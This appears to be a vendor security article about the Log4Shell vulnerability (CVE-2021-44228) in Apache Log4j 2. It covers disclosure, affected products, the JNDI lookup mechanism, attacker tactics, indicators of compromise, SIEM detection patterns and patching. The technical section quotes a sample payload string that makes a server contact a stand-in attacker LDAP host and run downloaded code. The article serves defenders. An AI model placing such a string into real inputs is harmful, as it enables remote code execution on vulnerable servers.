What is CVE-2021-44228 Vulnerability?
A critical remote code execution (RCE) vulnerability in Apache Log4j 2, a popular Java logging library. Nicknamed Log4Shell, it allows an attacker to execute arbitrary code on a server by sending a specially crafted log message. It’s one of the most severe vulnerabilities ever discovered, earning a CVSS score of 10.0 out of 10.0.
When was it Discovered?
The CVE-2021-44228 vulnerability was publicly disclosed on December 9, 2021. It was originally discovered by Chen Zhaojun of Alibaba Cloud Security Team and reported to Apache on November 24, 2021. The public release triggered a massive, worldwide scramble as organizations rushed to understand their exposure and apply patches.
Affected Products & Versions
Log4Shell impacted a massive range of software and services that used the Apache Log4j 2 library. The scope was so vast because Log4j is a foundational component in countless Java-based applications, from enterprise software to cloud services.
Product/Library | Versions Affected | Fixed Versions / Patch Links |
Apache Log4j 2 | 2.0-beta9 through 2.14.1 | 2.15.0 and later |
Apache Struts | 2.5 - 2.5.29 | 2.5.30 |
Apache Solr | 8.11.0 and earlier | 8.11.1 |
Apache Druid | 0.22.0 and earlier | 0.22.1 |
VMware vCenter | 6.5, 6.7, 7.0 | Patched versions & workarounds |
Minecraft: Java Edition | All versions from 1.7 to 1.18 | 1.18.1 and later |
CVE-2021-44228 Technical Description
The root cause of the CVE-2021-44228 vulnerability lies in how Log4j processes log messages. The library supported a feature called "message lookup substitution," which allowed certain strings in logs to be replaced with dynamically generated values. One of these lookup methods was the Java Naming and Directory Interface (JNDI).
Attackers found that they could craft a malicious string, like ${jndi:ldap://attacker.com/a}, and get it logged by a vulnerable application. When Log4j processed this log, it would interpret the JNDI lookup, connect to the attacker-controlled LDAP server, and download and execute a malicious Java class. This gives the attacker a foothold for remote code execution. Because applications log all sorts of user-provided data (like User-Agent headers or form submissions), creating a CVE-2021-44228 exploit was frighteningly simple.
Tactics, Techniques & Procedures (TTPs)
Threat actors went wild with this one. Initial TTPs involved widespread scanning to find vulnerable endpoints. Once an entry point was found, attackers used the CVE-2021-44228 exploit to drop ransomware, install cryptominers, steal credentials, and establish persistent backdoors for later access. Many nation-state actors and cybercrime groups quickly integrated Log4Shell into their playbooks, using it as the initial access vector for broader campaigns.
Indicators of Compromise
Detecting a Log4Shell attack involves looking for specific patterns in your logs. The most obvious CVE-2021-44228 vulnerability indicators of compromise (IOCs) are log entries containing the ${jndi:} string, especially with protocols like ldap, ldaps, or rmi. You should also monitor for suspicious outbound network connections from your application servers to unusual IP addresses or domains, as this could indicate a successful JNDI lookup callback.
Known Proof-of-Concepts & Exploits
Within hours of disclosure, multiple CVE-2021-44228 proof of concept (PoC) exploits became publicly available on platforms like GitHub. This dramatically lowered the barrier to entry, enabling even less-skilled attackers to leverage the flaw. The high exploitability led to mass exploitation campaigns by botnets like Mirai and Kinsing, which used Log4Shell to propagate and install malware. Security researchers also developed PoCs to help defenders test their own systems for vulnerabilities.
How to Detect CVE-2021-44228 Vulnerability?
CVE-2021-44228 vulnerability detection requires a multi-layered approach. Start by scanning your environment for applications using vulnerable versions of the Log4j 2 library. Host-based detection tools can identify the presence of these libraries on disk. For active threats, your Security Information and Event Management (SIEM) system is key. Ingest web server logs, application logs, and firewall logs, and create rules to alert on strings like ${jndi:} or on outbound connections from application servers over protocols like LDAP or RMI. Sample queries might look for *jndi:ldap* or *jndi:rmi* in HTTP request fields. A robust Endpoint Detection and Response (EDR) solution can also help spot post-exploitation activity.
Impact & Risk of CVE-2021-44228 Vulnerability
The impact of Log4Shell was catastrophic. Its simplicity and the widespread use of Log4j meant that millions of servers were instantly at risk. A successful exploit grants an attacker full control over the affected system, compromising data confidentiality, integrity, and availability. Attackers could steal sensitive data, deploy ransomware to encrypt entire networks, or use the compromised server as a pivot point to move deeper into a corporate network. The business risk was immense, leading to service downtime, costly incident response efforts, and severe reputational damage.
Mitigation & Remediation Strategies
The primary CVE-2021-44228 vulnerability mitigation is to patch affected systems immediately. Update any instance of Apache Log4j to version 2.17.1 or newer, as these versions disable the vulnerable JNDI functionality by default and fix other related CVEs.
If you can't patch right away, a few temporary fixes exist:
Set the Log4j system property log4j2.formatMsgNoLookups to true.
Remove the JndiLookup class from the Log4j classpath.
However, these are stopgap measures. The only real long-term solution is applying the CVE-2021-44228 patch. A strong defense-in-depth strategy, including network segmentation and egress filtering, can also limit the blast radius if an exploit does occur.
CVE-2021-44228 Vulnerability FAQs
Protect What Matters
